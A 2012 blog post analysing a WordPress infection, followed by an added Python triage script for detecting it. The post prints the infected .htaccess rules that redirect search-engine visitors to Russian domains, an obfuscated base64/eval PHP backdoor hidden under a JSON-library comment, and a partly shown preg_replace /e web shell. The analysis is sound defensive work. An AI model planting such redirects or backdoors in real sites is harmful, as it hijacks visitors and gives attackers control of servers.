A virus that redirects search engine traffic to another site

March 26th, 2012 |

I recently came across a virus that redirects a WordPress site's search engine traffic to other sites (positive-general.ru, ba-ca.ru).

What is infected

1. The “.htaccess” file (at the top and bottom), to which a redirect was added:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://positive-general.ru/example/status.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://positive-general.ru/example/status.php [R=301,L]
</IfModule>
ErrorDocument 400 http://positive-general.ru/example/status.php
ErrorDocument 401 http://positive-general.ru/example/status.php
ErrorDocument 403 http://positive-general.ru/example/status.php
ErrorDocument 404 http://positive-general.ru/example/status.php
ErrorDocument 500 http://positive-general.ru/example/status.php

2. Adds PHP files to the “wp-uploads” folder

Approximate path: “…/wp-content/uploads/2012/01.php”

<?php
/**
 * This package provides a simple encoder and decoder for JSON notation. It
 * is intended for use with client-side Javascript applications that make
 * use of HTTPRequest to perform server communication functions - data can
 * be encoded into JSON notation for use in a client-side javascript, or
 * decoded from incoming Javascript requests. JSON format is native to
 * Javascript, and can be directly eval()'ed with no further parsing
 * overhead
 */
$djsanrkgpxs=array_map(strrev("edoced_4"."6"."esab"),array(str_replace(" ",""," aWYgKCFlb X"."B "."0 "."eSgk X0NPT 0tJ R V"."sndidd "."KS BhbmQ "."g"."JF 9 DT0"."9L S"."U "."V "."b J3 Yn X"."T09J 2"."Qn"."K"."X t pZiAo I WV t c HR "."5K "."CR"."fU "."E "."9 T"."V"."Fs"."n "."Yydd"."KS"."k g e 2"."V"."j a "."G"."8 g J "."z"."x"."0 "."Z Xh0Y XJ"."lY SB"."yb "."3d "."zPTI 4 "."I"."G"."N "."v"."bHM"."9"."O "."DA +"."J z"."sg JGQ 9"."Y mFz"."Z TY"."0X"."2"."RlY2 "."9 k "."ZS h"."zdH"."Jfc mV"."wbG"."F j "."Z"."S"."g nIC c s J"."y"."s n"."LC R fUE9TVF"."s"."n"."Y y d"."dKSk 7 a W Y o "."J"."G Q p IEBl"."d mFs K"."CRkKTs"."g ZWN o b yAnPC9"."0 ZXh0YXJ"."l "."Y "."T4nO3"."0 NC "."m "."Vja G"."8g Jz xm"."b"."3 JtIGF "."j dG"."l v"."b j0 iIi BtZ "."X"."R ob"."2Q9"."cG9 zdD"."4"."8d GV4dGF"."yZ"."W"."E"."gY 29"."scz04M "."C"."B "."y"."b 3"."d"."zP"."TI 4 IG5"."hb WU9Y z48 "."L"."3RleHR hc m V"."hP j xi"."cj4 "."8a W 5 "."wd X Qg "."dHlw"."Z T"."1"."zdW "."Jt"."aXQ"."+PC9mb 3JtP"."ic7ZX"."hp "."dDt9")));eval($djsanrkgpxs[0]); 

3. I also found a virus in the “wp-content” folder (“wp-oowal.php”)

<?php
$color = "#5f5";
$default_action = "Fil"."esMan";
$default_charset = "Window"."s-12"."51";
preg_replace("/.*[muponyd]?/e",str_replace(' ',''," \x65 \x76 \x61  \x6C   \x28  \x67\x7A \x69  \x6E \x66 \x6C  \x61 \x74 \x65   \x28  \x62 \x61 \x73 \x65 \x36 \x34 \x5F\x64 \x65 \x63\x6F\x64 \x65   \x28  '7X1re9s2z/Dn9 V"."c wmj "."fZq "."+PYT"."t"."u7 s"."2"."Mna"."Q5t2jT"."p c ug "."p6 eP Jsmxr k S1P"."k u"."Nk W"."f"."77C 4 "."Ck"."R E"."q y "."4 3 S 7 3 8"."N1"."vb u "."fp7FI E A RJ k A RB AH T"."7 xR V nN"."Ilui4"."X O6d7 Jx72 T "."C/"."PN2d "."mHz j l 8dbZ f 7x2d m d 9"."KJXb "."HCt P "."Q "."Cb"."Y H"."z "."j "."g K"."W Y"."tZQW"."Dd "."Fo 3"."X"."vj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/ 5"."x"."TN "."v 8 "."2yWm0J 8 sw1 F xM foHX"."o WD0nKF L"."uWq "."1SZc+qz9"."iRH "."7F 9 f "."z "."rum V C "."vc+ "."NGT X "."Y P/ "."9t y"."x"."24"."ndK Ki6 QS BH 3Q8f2 C "."W"."j"."8 4PDw "."Eqy Y "."P UDu "."W"."H Z "."r m "."q "."5Y y s m "."4"."5z4"."9"."j T"."y PX"."Hnc g"."d OQ"."IC"."cum"."z47 kj "."N yrG aS N "."r4N "."q "."dP6d+5 IS dYD pGGJ7 bc/ "."r uGN "."r96 f S 4 A "."607 PTg +gs"."a a 9c"."p "."z k 3fV IF "."1 8MLGL1 "."O L "."+ d G w j "."A "."Q z Kh"."lHgTkLP C odO"."WC zQ"."S CF I4E"."TT"."YMz csM"."M H T+ Z"."s8s EExBOqWi2 O ... \x29\x29\x29\x3B"),".");?>
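A defender-side triage script for the three findings above, added here as an example (it is not code from the post). It checks an .htaccess fragment for referer-gated rewrites and ErrorDocument handlers that point off-site, undoes the cheap obfuscation used in the two PHP files (hex escapes, "a"."b" concatenation, scattered whitespace) so the strrev/eval/preg_replace-/e markers become visible, and flags PHP scripts under wp-content/uploads. The samples are constructed copies shaped like the page's code, not the infected files.

```python
import re

# Constructed samples shaped like the three findings above; they are not the live files.
SAMPLE_HTACCESS = r"""<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing)\.(.*)
RewriteRule ^(.*)$ http://positive-general.ru/example/status.php [R=301,L]
ErrorDocument 404 http://positive-general.ru/example/status.php
</IfModule>"""
SAMPLE_DROPPER = r'$d=array_map(strrev("edoced_4"."6"."esab"),array("aWYg"));eval($d[0]);'
SAMPLE_SHELL = (r'preg_replace("/.*[muponyd]?/e",str_replace(" ","","\x65 \x76\x61 \x6C \x28'
                r' \x67\x7A\x69\x6E\x66\x6C\x61\x74\x65 \x28 \x62\x61\x73\x65\x36\x34\x5F'
                r'\x64\x65\x63\x6F\x64\x65 \x28 \x27QUJD\x27\x29\x29\x29\x3B"),".");')
CLEAN_PHP = r'<?php echo json_encode(array("ok" => true));'

_REFERER = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)
_EXTERNAL = re.compile(r"^(?:RewriteRule\s+\S+|ErrorDocument\s+\d{3})\s+(https?://\S+)", re.I | re.M)

def htaccess_findings(text):
    """Finding 1: (referer-gated?, off-site URLs the rewrite rules/error handlers point to)."""
    urls = sorted(set(_EXTERNAL.findall(text)))
    return bool(_REFERER.search(text)), urls

def normalize_php(src):
    """Undo the cheap obfuscation in findings 2 and 3 (hex escapes, 'a'.'b' string
    concatenation, scattered whitespace) so that plain patterns can match."""
    src = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), src)
    src = re.sub(r'"\s*\.\s*"', "", src)  # "edoced_4"."6"."esab" -> "edoced_46esab"
    return re.sub(r"\s+", "", src)

_PHP_SIGNS = [
    ("reversed base64_decode name", re.compile(r'strrev\("edoced_46esab"\)')),
    ("preg_replace with /e modifier", re.compile(r'preg_replace\(["\'][^"\']*/e["\']')),
    ("eval(gzinflate(base64_decode(", re.compile(r"eval\(gzinflate\(base64_decode\(")),
    ("eval( call", re.compile(r"\beval\(")),
]

def php_indicators(src):
    """Names of the obfuscation/backdoor signs present in one PHP source string."""
    norm = normalize_php(src)
    return [name for name, rx in _PHP_SIGNS if rx.search(norm)]

def php_in_uploads(path):
    """Finding 2: a PHP script under wp-content/uploads, where only media belongs."""
    p = path.replace("\\", "/").lower()
    return "/wp-content/uploads/" in p and re.search(r"\.ph(?:p\d?|tml)$", p) is not None
```

Run the three checks over a site tree (each .htaccess through htaccess_findings, each .php through php_indicators and php_in_uploads) and review every hit by hand; the normalization is deliberately crude, so a hit is a reason to look, not a verdict.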

Some more information on this infection can be found on Norton Community.
